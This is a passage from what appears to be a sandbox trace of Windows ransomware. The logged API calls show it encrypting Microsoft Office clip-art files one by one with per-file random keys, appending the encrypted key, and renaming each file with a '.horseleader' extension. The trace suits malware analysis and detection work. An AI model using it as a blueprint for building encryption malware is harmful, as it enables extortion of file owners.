StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF", lpSrch=".testttjffg") returned 0x0 [0253.842] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.842] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.843] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0253.843] StrStrW (lpFirst="CRANE.WMF", lpSrch=".txt") returned 0x0 [0253.843] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5270) returned 1 [0253.843] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1496, lpOverlapped=0x0) returned 1 [0253.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1496, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1496, lpOverlapped=0x0) returned 1 [0253.845] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.845] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.846] CloseHandle (hObject=0x158) returned 1 [0253.846] GetProcessHeap () returned 0x780000 [0253.846] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.846] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.horseleader") returned 76 [0253.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.horseleader")) returned 1 [0253.847] GetProcessHeap () returned 0x780000 [0253.847] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.847] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x60609cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0xc18a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CRANINST.WMF", cAlternateFileName="")) returned 1 [0253.847] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="Windows") returned -1 [0253.847] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0253.847] StrStrIW (lpFirst="CRANINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.847] lstrcmpW (lpString1="CRANINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.847] lstrcmpW (lpString1="CRANINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.847] lstrlenW (lpString=".testttjffg") returned 11 [0253.847] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.848] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.848] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0253.849] StrStrW (lpFirst="CRANINST.WMF", lpSrch=".txt") returned 0x0 [0253.849] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=49546) returned 1 [0253.849] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.852] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.852] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.853] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.853] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.854] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x218a, lpOverlapped=0x0) returned 1 [0253.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffde76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x218a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x218a, lpOverlapped=0x0) returned 1 [0253.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.854] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.855] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.855] CloseHandle (hObject=0x158) returned 1 [0253.855] GetProcessHeap () returned 0x780000 [0253.855] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.855] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.horseleader") returned 79 [0253.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\craninst.wmf.horseleader")) returned 1 [0253.856] GetProcessHeap () returned 0x780000 [0253.856] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.856] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d354f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xb96, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CUP.WMF", cAlternateFileName="")) returned 1 [0253.857] lstrcmpiW (lpString1="CUP.WMF", lpString2="Windows") returned -1 [0253.857] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0253.857] StrStrIW (lpFirst="CUP.WMF", lpSrch=".horseleader") returned 0x0 [0253.857] lstrcmpW (lpString1="CUP.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.857] lstrcmpW (lpString1="CUP.WMF", lpString2="_uninstalling_.png") returned 1 [0253.857] lstrlenW (lpString=".testttjffg") returned 11 [0253.857] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF", lpSrch=".testttjffg") returned 0x0 [0253.857] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.857] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0253.859] StrStrW (lpFirst="CUP.WMF", lpSrch=".txt") returned 0x0 [0253.859] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2966) returned 1 [0253.859] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb96, lpOverlapped=0x0) returned 1 [0253.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff46a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb96, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb96, lpOverlapped=0x0) returned 1 [0253.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.861] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.861] CloseHandle (hObject=0x158) returned 1 [0253.861] GetProcessHeap () returned 0x780000 [0253.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.861] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.horseleader") returned 74 [0253.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.horseleader")) returned 1 [0253.863] GetProcessHeap () returned 0x780000 [0253.863] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.863] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CUPINST.WMF", cAlternateFileName="")) returned 1 [0253.863] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="Windows") returned -1 [0253.863] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0253.863] StrStrIW (lpFirst="CUPINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.863] lstrcmpW (lpString1="CUPINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.863] lstrcmpW (lpString1="CUPINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.863] lstrlenW (lpString=".testttjffg") returned 11 [0253.863] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.863] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.863] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.864] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.865] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0253.865] StrStrW (lpFirst="CUPINST.WMF", lpSrch=".txt") returned 0x0 [0253.865] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10326) returned 1 [0253.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2856, lpOverlapped=0x0) returned 1 [0253.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd7aa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2856, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2856, lpOverlapped=0x0) returned 1 [0253.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.867] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.868] CloseHandle (hObject=0x158) returned 1 [0253.868] GetProcessHeap () returned 0x780000 [0253.868] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.868] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.horseleader") returned 78 [0253.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.horseleader")) returned 1 [0253.869] GetProcessHeap () returned 0x780000 [0253.869] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.869] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7992, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00117_.WMF", cAlternateFileName="")) returned 1 [0253.869] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="Windows") returned -1 [0253.869] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0253.869] StrStrIW (lpFirst="DD00117_.WMF", lpSrch=".horseleader") returned 0x0 [0253.869] lstrcmpW (lpString1="DD00117_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.869] lstrcmpW (lpString1="DD00117_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.869] lstrlenW (lpString=".testttjffg") returned 11 [0253.869] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.869] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.869] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.871] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0253.871] StrStrW (lpFirst="DD00117_.WMF", lpSrch=".txt") returned 0x0 [0253.871] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=31122) returned 1 [0253.871] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2992, lpOverlapped=0x0) returned 1 [0253.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd66e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.874] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2992, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2992, lpOverlapped=0x0) returned 1 [0253.875] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.875] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.875] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.875] CloseHandle (hObject=0x158) returned 1 [0253.875] GetProcessHeap () returned 0x780000 [0253.875] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.875] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.horseleader") returned 79 [0253.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.horseleader")) returned 1 [0253.876] GetProcessHeap () returned 0x780000 [0253.876] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.876] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6a43700, ftCreationTime.dwHighDateTime=0x1bd4aee, ftLastAccessTime.dwLowDateTime=0x606ee510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6a43700, ftLastWriteTime.dwHighDateTime=0x1bd4aee, nFileSizeHigh=0x0, nFileSizeLow=0x2040, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00121_.WMF", cAlternateFileName="")) returned 1 [0253.876] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="Windows") returned -1 [0253.876] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0253.876] StrStrIW (lpFirst="DD00121_.WMF", lpSrch=".horseleader") returned 0x0 [0253.876] lstrcmpW (lpString1="DD00121_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.876] lstrcmpW (lpString1="DD00121_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.876] lstrlenW (lpString=".testttjffg") returned 11 [0253.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, 